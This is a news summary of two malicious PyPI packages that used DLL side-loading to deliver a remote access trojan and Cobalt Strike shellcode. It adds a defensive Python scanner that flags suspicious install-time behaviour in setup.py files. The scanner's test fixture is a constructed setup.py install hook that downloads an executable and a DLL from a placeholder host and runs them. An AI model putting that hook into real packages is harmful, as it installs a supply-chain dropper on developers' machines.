New Malicious PyPI Packages Caught Using Covert Side-Loading Tactics


February 21, 2024 at 04:27AM

Cybersecurity researchers discovered two malicious Python packages on the PyPI repository, NP6HelperHttptest and NP6HelperHttper, that used DLL side-loading to evade detection by security software. The fake packages were designed to deceive developers into downloading rogue counterparts of legitimate ones. The malicious code included a remote access trojan and was part of a wider campaign targeting software supply chain security.

According to the meeting notes dated Feb 20, 2024, cybersecurity researchers discovered two malicious packages on the Python Package Index (PyPI) repository, named NP6HelperHttptest and NP6HelperHttper, that used a DLL side-loading technique to evade detection by security software and run malicious code. The packages, which posed as legitimate helper tools from ChapsVision, were downloaded multiple times before being removed.

The analysis revealed that the rogue packages contained a setup.py script that, when the package was installed, downloaded a vulnerable executable (“ComServer.exe”) together with a malicious DLL (“dgdeskband64.dll”); running the executable side-loads the DLL, which executes remote access trojan code. The malicious DLL communicated with an attacker-controlled domain to fetch a GIF file containing Cobalt Strike Beacon shellcode.
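The install-time behaviour described above (a setup.py that fetches a Windows executable and a DLL from a remote host and launches them) is something a package review pipeline can triage statically before anything is installed. The following is an added example for that purpose; it is not code from the article or from the packages it describes. It parses a setup.py with Python's `ast` module and flags network fetches, references to `.exe`/`.dll` artifacts, and process spawning. The two sample setup.py files, the `np6helper-lookalike` package name and the `example.invalid` host are constructed for this example and are not taken from the real packages.

```python
"""Static triage of a setup.py for install-time download-and-execute behaviour.

Added example, not code from the article or the packages it describes.
Walks the setup.py AST and reports calls that fetch remote content, string
literals naming Windows binaries, and calls that spawn processes.
"""
import ast

# Attribute names treated as network fetches when called on a network module.
NETWORK_CALLS = {"urlopen", "urlretrieve", "get", "post", "request"}
NETWORK_ROOTS = {"urllib", "requests", "httpx", "http"}
# Attribute names treated as process execution when called on os/subprocess.
EXEC_CALLS = {"Popen", "call", "run", "check_call", "check_output", "system", "startfile"}
EXEC_ROOTS = {"os", "subprocess"}
BINARY_SUFFIXES = (".exe", ".dll")


def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_setup_py(source: str) -> list:
    """Return a list of {'line', 'kind', 'detail'} findings for the given setup.py source."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        # Any string literal naming a Windows PE artifact is worth a look.
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if node.value.lower().endswith(BINARY_SUFFIXES):
                findings.append({"line": node.lineno, "kind": "binary_artifact", "detail": node.value})
        elif isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name is None:
                continue
            head, _, tail = name.rpartition(".")
            root = head.split(".")[0]
            if tail in NETWORK_CALLS and root in NETWORK_ROOTS:
                findings.append({"line": node.lineno, "kind": "network_fetch", "detail": name})
            elif tail in EXEC_CALLS and root in EXEC_ROOTS:
                findings.append({"line": node.lineno, "kind": "process_exec", "detail": name})
    return findings


def is_suspicious(findings) -> bool:
    """A remote fetch combined with a binary drop or a process spawn is the pattern to escalate."""
    kinds = {f["kind"] for f in findings}
    return "network_fetch" in kinds and bool(kinds & {"process_exec", "binary_artifact"})


# Constructed sample: a setup.py that downloads and launches binaries during install.
# The host is a placeholder (.invalid TLD); the package name is made up for this example.
SAMPLE_SETUP_PY = '''\
from setuptools import setup
from setuptools.command.install import install
import os, subprocess, urllib.request

class PostInstall(install):
    def run(self):
        install.run(self)
        base = os.path.join(os.environ.get("TEMP", "."), "helper")
        os.makedirs(base, exist_ok=True)
        urllib.request.urlretrieve("http://example.invalid/loader.exe", os.path.join(base, "loader.exe"))
        urllib.request.urlretrieve("http://example.invalid/helper.dll", os.path.join(base, "helper.dll"))
        subprocess.Popen([os.path.join(base, "loader.exe")])

setup(name="np6helper-lookalike", version="0.0.1", cmdclass={"install": PostInstall})
'''

# Constructed sample: an ordinary setup.py with no install-time side effects.
BENIGN_SETUP_PY = '''\
from setuptools import setup
setup(name="np6helper", version="1.0.0", packages=["np6helper"])
'''


if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_SETUP_PY), ("benign", BENIGN_SETUP_PY)):
        found = scan_setup_py(src)
        print(f"{label}: suspicious={is_suspicious(found)}")
        for f in found:
            print(f"  line {f['line']:>3}  {f['kind']:<16} {f['detail']}")
```

The scanner only catches the literal pattern; a setup.py that hides its behaviour behind `exec` of a decoded string or behind a helper module will not trip these rules, so treat a clean result as "nothing obvious" rather than "safe". In practice it pairs with installing untrusted packages in a sandbox with network access blocked, and with reviewing the sdist rather than relying on the project description on PyPI.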

The incident suggests a broader campaign involving the distribution of similar vulnerable executables susceptible to DLL side-loading, emphasizing the importance of supply chain security awareness for development organizations using open-source package repositories.

The meeting notes highlighted the critical need for vigilance in the face of supply chain threats, as threat actors may exploit open-source package repositories to impersonate companies and their software products and tools.


